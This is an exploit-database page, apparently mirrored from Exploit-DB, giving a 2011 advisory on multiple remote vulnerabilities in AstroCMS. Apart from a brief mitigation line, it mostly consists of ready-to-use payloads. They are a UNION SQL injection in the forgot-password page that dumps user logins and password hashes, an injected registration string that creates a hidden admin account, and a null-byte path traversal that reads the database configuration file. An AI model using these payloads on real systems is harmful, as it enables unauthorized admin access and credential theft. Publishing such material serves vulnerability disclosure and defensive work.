header-logo
Suggest Exploit
vendor:
AstroCMS
by:
brain[pillow]
7.5
CVSS
HIGH
SQL-INJ, Register User, Read File
89, 264, 434
CWE
Product Name: AstroCMS
Affected Version From: UNKNOWN
Affected Version To: UNKNOWN
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

AstroCMS Multiple Remote Vulnerabilities

A vulnerability in AstroCMS allows an attacker to exploit a SQL-INJ vulnerability in the forgot password page, register a user with admin rights and read files from the server.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a SQL query.
Source

Exploit-DB raw data:

# Exploit Title: AstroCMS Multiple Remote Vulnerabilities
# Google Dork: none
# Date: 12.03.2011
# Author: brain[pillow]
# Software Link: http://www.astrocms.com/
# Version: UNKNOWN

============================================================
FORGOT_PASSWORD SQL-INJ EXPLOIT:
============================================================

 /registration/forgot/

 a' union select 0,0,0,0,concat_ws(0x3a,login,password,email,status ,level),0,0,0,0,0,0,0 from auth_users where id=5#

id=6 - usually admin

============================================================
REGISTER_USER EXPLOIT:
============================================================
 /registration/

adrnin','4297f44b13955235245b2497399d7a93','adrnin ','okk@mail.com',1,5,'','','')#

Submitting this to "login field" will add "adrnin" user with admin rights and password "123123".
Usually 5 - is admin group.

============================================================
READ FILE EXPLOIT:
============================================================

 /include/get_js.php4?fname=../htdocs/include/config_mysql.inc%00.js

OR:

 /include/get_js.php?fname=../htdocs/include/config_mysql.inc%00.js